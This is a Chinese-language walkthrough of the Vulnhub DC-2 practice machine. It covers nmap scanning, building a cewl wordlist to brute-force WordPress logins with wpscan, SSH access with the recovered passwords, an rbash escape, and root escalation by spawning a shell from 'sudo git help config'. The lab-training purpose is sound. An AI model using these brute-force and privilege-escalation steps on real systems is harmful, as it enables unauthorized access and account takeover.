国庆黑客做什么?一起玩转​vulnhub靶场
2022-10-1 09:12:38 Author: 白帽子程序员(查看原文) 阅读量:18 收藏

vulnhub DC-2靶机实战

0X01 环境部署

下载地址

https://www.vulnhub.com/entry/dc-2,311/

下载后解压,vm打开

由于自己ip是在192.168.6.3 如果虚拟机还是桥接则不好判断虚拟机的ip地址,所以调整为net模式

0X02 信息收集

1.ip收集

信息收集第一步肯定是先找ip,由于知道自己虚拟机网段是192.168.23.xxx

所以利用nmap工具进行扫描

命令

nmap -sP 192.168.23.0/24

192.168.23.173

2.端口信息收集

nmap --script=vuln 192.168.23.173

开启的80端口,且cms貌似是wordpress 不排除误报

尝试访问

http://192.168.23.173:80

抓取网络数据包,发现做了重定向,跳转的目标是dc-2

3.修改本地host文件

在本地host文件中添加ip 写死指定目标为 dc-2

192.168.23.173  dc-2

可以看到确实是wordpress,而且存在一个flag

4.flag1

大概意思就是让我登录才能看到下一个flag

刚刚nmap扫出来的就有用了

有路径,有用户

尝试访问

http://192.168.23.173/wp-login.php

此时用到wspcan 可以爆破用户的密码

刚刚网页上有cewl 拿去百度,是一个可以将网站的密码生成一个字典

cewl http://dc-2 -w dict.txt            生成字典
cat dict.txt 查看是否生成字典

再利用wpscan

新建一个txt文档将三个用户写入

wpscan --url http://dc-2    -P dict.txt     -U user.txt

| Username: jerry, Password: adipiscing
| Username: tom, Password: parturient

5.flag2

尝试登录 jerry登录成功找到了flag2

貌似意思是这条路找不到下去了,换条路吧

0X03 Getshell

1flag3

没思路了,再用nmap扫一次全端口

nmap -A  -p 1-65535 192.168.23.173
-A 全面扫描
-p 1-65535 全端口扫描

ssh 22端口改成了7744

尝试连接

ssh [email protected] -p 7744

连不上换个用户

ssh [email protected] -p 7744
在输入密码 parturient
连接成功

查看有啥内容 有个flag3

查看

cat flag3.txt
vim flag3.txt
vi flag3.txt

尝试几种打开方式,终于打开

三个重要的信息

tom jerry su
看到su 猜测和上一个一样需要提权什么的


flag4

发现刚刚都是有rbash

去网上查一下

切换到jerry用户

尝试返回上一级目录进入jerry目录

找到了flag4

0X04 提权 

4.1 flag5

不知道怎么办,看了看教程,flag4最后有一个git,百度git提权

sudo -l查看可以sudo的用户


这里采用方法一
sudo git help config
执行之后在最后一行输入
!/bin/bash


查询当前用户权限
whoami  -----> root


cd /root
切换到root目录下查看root目录下的内容
cat final-flag.txt


5.总结
1.首先利用nmap全端口扫描一个一个的利用

2.先解决重定向问题,正常打开网站得到flag1

3.利用wpscan爆破密码

4.登录得到flag2,80端口利用完毕

5.7744ssh端口利用账号密码登录,得到flag3

6.通过flag3提权到另一个用户找到flag4

7.git提权到root找到final-flag.txt

本文作者:

 转载请注明来自FreeBuf.COM


文章来源: http://mp.weixin.qq.com/s?__biz=Mzg3Mjc0MDQ2Nw==&mid=2247489288&idx=1&sn=32123cd6315c0674c977fa23286eac1f&chksm=ceebf414f99c7d02cdf533e907812e6b025649d9134b0e42d468c2abacb0ead532f305c10a6d#rd
如有侵权请联系:admin#unsafe.sh